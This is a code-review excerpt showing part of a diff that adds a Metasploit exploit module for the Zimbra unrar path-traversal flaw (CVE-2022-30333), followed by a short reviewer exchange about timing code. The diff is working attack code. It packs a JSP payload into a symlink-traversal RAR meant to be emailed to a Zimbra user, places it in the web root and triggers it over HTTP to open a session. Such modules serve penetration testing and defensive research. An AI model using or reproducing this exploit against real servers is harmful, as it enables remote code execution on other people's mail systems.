modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb

```diff
@@ -0,0 +1,176 @@
+        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),
+        OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),
+
+        # Took this from multi/handler
+        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
+        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])
+      ]
+    )
+  end
+
+  # Generate an on-system filename using datastore options
+  def generate_target_filename
+    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
+      print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
+    end
+
+    File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")
+  end
+
+  # Normalize the path traversal and figure out where it is relative to the web root
+  def zimbra_get_public_path(target_filename)
+    # Normalize the path
+    normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath
+
+    # Figure out where it is, relative to the webroot
+    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')
+    relative_path = normalized_path.relative_path_from(webroot)
+
+    # Hopefully, we found a path from the webroot to the payload!
+    if relative_path.to_s.start_with?('../')
+      return nil
+    end
+
+    relative_path
+  end
+
+  def exploit
+    print_status('Encoding the payload as a .jsp file')
+    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)
+
+    # Create a file
+    target_filename = generate_target_filename
+    print_status("Target filename: #{target_filename}")
+    rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)
+    if rar.nil?
+      fail_with(Failure::BadConfig, 'Failed to encode RAR file')
+    end
+
+    file_create(rar)
+
+    print_good('File created! Email the file above to any user on the target Zimbra server')
+
+    # Bail if they don't want the payload triggered
+    return unless datastore['TRIGGER_PAYLOAD']
+
+    # Get the public path for triggering the vulnerability, terminate if we
+    # can't figure it out
+    public_filename = zimbra_get_public_path(target_filename)
+    if public_filename.nil?
+      print_warning('Could not determine the public web path, disabling payload triggering')
+      return
+    end
+
+    register_file_for_cleanup(target_filename)
+
+    # This loop is mostly from `multi/handler`
+    stime = Time.now.to_f
```

Comment:
Using `Time.now` can have issues 👀 

https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/

Reply:
The code's from other Framework code, we should maybe fix this as well: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/handler.rb#L61

Reply:
Fixed